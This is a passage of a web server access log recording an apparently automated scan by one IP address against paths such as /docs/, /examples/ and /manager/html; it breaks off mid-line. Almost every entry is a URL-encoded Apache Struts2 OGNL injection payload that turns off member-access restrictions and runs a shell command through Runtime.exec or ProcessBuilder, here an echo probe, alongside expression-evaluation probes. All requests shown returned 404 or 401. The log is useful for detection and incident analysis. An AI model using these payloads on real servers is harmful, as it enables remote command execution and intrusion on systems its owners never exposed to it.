/docs/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 933 208.87.206.42 - - [09/Jan/2024:13:26:53 +0100] "GET /docs/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 933 208.87.206.42 - - [09/Jan/2024:13:26:54 +0100] "GET /docs/(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.0" 404 1051 208.87.206.42 - - [09/Jan/2024:13:26:55 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:55 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:56 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:56 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:26:57 +0100] "POST /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:27:00 +0100] "GET /docs/?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:27:01 +0100] "GET /docs/%24%7B6970728%2B1440162%7D/index.action HTTP/1.0" 404 770 208.87.206.42 - - [09/Jan/2024:13:27:01 +0100] "GET /docs/ HTTP/1.0" 404 727 208.87.206.42 - - [09/Jan/2024:13:27:03 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:05 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:09 +0100] "GET /examples/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:09 +0100] "GET /examples/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:10 +0100] "GET /examples/?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:10 +0100] "GET /examples/?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:11 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:12 +0100] "GET /examples//devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 750 208.87.206.42 - - [09/Jan/2024:13:27:13 +0100] "GET /examples//devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 404 750 208.87.206.42 - - [09/Jan/2024:13:27:13 +0100] "GET /examples/&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1244 208.87.206.42 - - [09/Jan/2024:13:27:15 +0100] "GET /examples/&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 1244 208.87.206.42 - - [09/Jan/2024:13:27:16 +0100] "GET /examples/%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1244 208.87.206.42 - - [09/Jan/2024:13:27:17 +0100] "GET /examples/%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 1244 208.87.206.42 - - [09/Jan/2024:13:27:17 +0100] "GET /examples/?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:18 +0100] "GET /examples/?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:20 +0100] "GET /examples/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1119 208.87.206.42 - - [09/Jan/2024:13:27:21 +0100] "GET /examples/%24%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23m.setAccessible(true)%2C%23m.set(%23_memberAccess%2Ctrue)%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream())%2C%23q%7D.action HTTP/1.0" 404 1119 208.87.206.42 - - [09/Jan/2024:13:27:22 +0100] "GET /examples/?redirect%3A%24%7B4510155%2B6697474%7D HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:23 +0100] "GET /examples/?redirect%3A%24%7B4510155%2B6697474%7D HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:23 +0100] "GET /examples/?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:24 +0100] "GET /examples/?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:27 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:28 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:29 +0100] "GET /examples/?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:30 +0100] "GET /examples/?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:31 +0100] "GET /examples/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 937 208.87.206.42 - - [09/Jan/2024:13:27:32 +0100] "GET /examples/%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D%2B602%2B53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.0" 404 937 208.87.206.42 - - [09/Jan/2024:13:27:32 +0100] "GET /examples/(%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23wr%3D%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23rs%3D@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=echo%20ccvaevcc HTTP/1.0" 404 1055 208.87.206.42 - - [09/Jan/2024:13:27:33 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:34 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:35 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:36 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:37 +0100] "POST /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:38 +0100] "GET /examples/?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3F(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=echo%20ccvaevcc HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:38 +0100] "GET /examples/%24%7B6992328%2B1559315%7D/index.action HTTP/1.0" 404 774 208.87.206.42 - - [09/Jan/2024:13:27:39 +0100] "GET /examples/ HTTP/1.0" 404 731 208.87.206.42 - - [09/Jan/2024:13:27:40 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:41 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:43 +0100] "GET /manager/html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:44 +0100] "GET /manager/html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:45 +0100] "GET /manager/html?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:46 +0100] "GET /manager/html?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:48 +0100] "POST /manager/html HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:48 +0100] "GET /manager/html/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:49 +0100] "GET /manager/html/devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.0" 401 2499 208.87.206.42 - - [09/Jan/2024:13:27:50 +0100] "GET /manager/html&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 2054 208.87.206.42 - - [09/Jan/2024:13:27:53 +0100] "GET /manager/html&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27echo%20ccvaevcc%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)(%27meh%27)%5D HTTP/1.0" 404 2054 208.87.206.42 - - [09/Jan/2024:13:27:54 +0100] "GET /manager/html%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D HTTP/1.0" 404 2054 208.87.206.42 - - [09/Jan/2024:13:27:54 +0100] "GET 